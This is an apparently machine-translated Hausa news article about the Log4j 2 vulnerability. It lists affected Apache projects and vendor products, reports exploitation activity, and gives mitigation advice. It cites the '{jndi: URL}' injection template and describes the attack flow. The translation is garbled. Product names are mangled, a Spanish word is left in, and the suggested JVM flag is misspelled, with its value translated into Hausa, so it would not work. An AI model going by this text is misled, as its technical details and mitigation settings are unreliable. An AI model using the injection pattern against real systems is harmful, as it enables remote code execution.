Kusan ayyukan Apache guda 17 rashin lahani na Log4j 2 ya shafa

Darkcrizt

4 minti

log4j

Cikin kwanakin karshe akan yanar gizo an yi ta maganganu game da raunin Log4j wanda aka gano nau'ikan hare-hare iri-iri sannan kuma an tace wasu ayyuka daban-daban don cin gajiyar raunin.

Muhimmancin lamarin shine wannan sanannen tsari ne don tsara rajista a aikace-aikacen Java., wanda ke ba da damar aiwatar da lambar sabani lokacin da aka rubuta ƙima ta musamman da aka tsara zuwa wurin rajista a cikin sigar "{jndi: URL}". Ana iya kai harin akan aikace-aikacen Java waɗanda ke tattara ƙimar da aka samo daga tushen waje, misali ta hanyar nuna ƙima mai matsala a cikin saƙonnin kuskure.

Kuma wannan shine maharin yana yin buƙatun HTTP akan tsarin da aka yi niyya, wanda ke haifar da log ɗin ta amfani da Log4j 2 Wanda ke amfani da JNDI don yin buƙatu zuwa wurin da maharin ke sarrafa shi. Lalacewar sa'an nan kuma ya sa tsarin da aka yi amfani da shi ya isa wurin kuma ya aiwatar da aikin biya. A yawancin hare-haren da aka lura, ma'aunin da ke na maharin shine tsarin rajista na DNS, wanda aka yi nufin yin rajistar buƙatu akan rukunin yanar gizon don gano tsarin masu rauni.

Kamar yadda abokin aikinmu Isaac ya riga ya bayyana:

Wannan raunin Log4j yana ba da damar yin amfani da ingantaccen shigar da ba daidai ba ga LDAP, yana ƙyale m code kisa (RCE), da kuma lalata uwar garken (tsarin sirri, amincin bayanai da wadatar tsarin). Bugu da kari, matsala ko mahimmancin wannan raunin yana cikin adadin aikace-aikace da sabar da suke amfani da ita, gami da software na kasuwanci da sabis na girgije kamar Apple iCloud, Steam, ko shahararrun wasannin bidiyo kamar Minecraft: Java Edition, Twitter, Cloudflare, Tencent, ElasticSearch, Redis, Elastic Logstash, da dai sauransu.

Da yake magana kan lamarin, kwanan nan An saki Apache Software Foundation mediante wani matsayi taƙaitaccen ayyukan da ke magance mummunar rauni a cikin Log4j 2 wanda ke ba da damar code na sabani don aiki akan sabar.

Ana shafar ayyukan Apache masu zuwa: Archiva, Druid, EventMesh, Flink, Fortress, Geode, Hive, JMeter, Jena, JSPWiki, OFBiz, Ozone, SkyWalking, Solr, Struts, TrafficControl, da Calcite Avatica. Lalacewar kuma ta shafi samfuran GitHub, gami da GitHub.com, GitHub Enterprise Cloud, da GitHub Enterprise Server.

A cikin 'yan kwanakin nan an sami karuwa sosai na ayyukan da ke da alaƙa da amfani da rauni. Misali, Duba Point ya shiga kusan yunƙurin amfani 100 a minti ɗaya akan sabar sa ta gaskiya kololuwar sa, kuma Sophos ya ba da sanarwar gano wani sabon botnet mai ma'adinai na cryptocurrency, wanda aka kirkira daga tsarin tare da raunin da ba a taɓa gani ba a cikin Log4j 2.

Dangane da bayanin da aka fitar game da matsalar:

  • An tabbatar da raunin a cikin hotuna na Docker da yawa, gami da couchbase, elasticsearch, flink, solr, hotunan hadari, da sauransu.
  • Rashin lahani yana nan a cikin samfurin Bincike na MongoDB Atlas.
  • Matsalar ta bayyana a cikin samfuran Cisco iri-iri, gami da Cisco Webex Meetings Server, Cisco CX Cloud Agent, Cisco.
  • Babban Rahoton Tsaro na Yanar Gizo, Tsaron Tsaro na Wuta na Wuta (FTD), Injin Sabis na Shaida na Cisco (ISE), Cisco CloudCenter, Cisco DNA Center, Cisco. BroadWorks, da sauransu.
  • Matsalar tana nan a cikin IBM WebSphere Application Server kuma a cikin samfuran Red Hat masu zuwa: OpenShift, OpenShift Logging, OpenStack Platform, Haɗin Raƙumi, CodeReady Studio, Grid Data, Fuse, da AMQ Streams.
  • Tabbatar da batun a cikin Junos Space Network Platform Management Platform, Northstar Controller / Planner, Paragon Insights / Pathfinder / Planner.
  • Yawancin samfura daga Oracle, vmWare, Broadcom, da Amazon suma abin ya shafa.

Ayyukan Apache waɗanda raunin Log4j 2 bai shafe su ba: Apache Iceberg, Guacamole, Hadoop, Log4Net, Spark, Tomcat, ZooKeeper, da CloudStack.

An shawarci masu amfani da fakitin matsala da su shigar da sabuntawar da aka saki cikin gaggawa a gare su, suna sabunta sigar Log4j 2 daban ko saita siga Log4j2.formatMsgNoLookups zuwa gaskiya (misali, ƙara maɓallin "-DLog4j2.formatMsgNoLookup = Gaskiya" a farawa).

Don kulle tsarin yana da rauni wanda babu damar shiga kai tsaye, an ba da shawarar yin amfani da rigakafin Logout4Shell, wanda, ta hanyar aiwatar da harin, ya fallasa saitunan Java "log4j2.formatMsgNoLookups = gaskiya", "com.sun.jndi .rmi.abu. trustURLCodebase = ƙarya "da" com.sun.jndi.cosnaming.object.trustURLCodebase = ƙarya "don toshe ƙarin bayyanar da rauni akan tsarin da ba a kula da shi ba.


Bar tsokaci

Your email address ba za a buga. Bukata filayen suna alama da *

*

*

  1. Alhakin bayanai: AB Internet Networks 2008 SL
  2. Manufar bayanan: Sarrafa SPAM, sarrafa sharhi.
  3. Halacci: Yarda da yarda
  4. Sadarwar bayanan: Ba za a sanar da wasu bayanan ga wasu kamfanoni ba sai ta hanyar wajibcin doka.
  5. Ajiye bayanai: Bayanin yanar gizo wanda Occentus Networks (EU) suka dauki nauyi
  6. Hakkoki: A kowane lokaci zaka iyakance, dawo da share bayanan ka.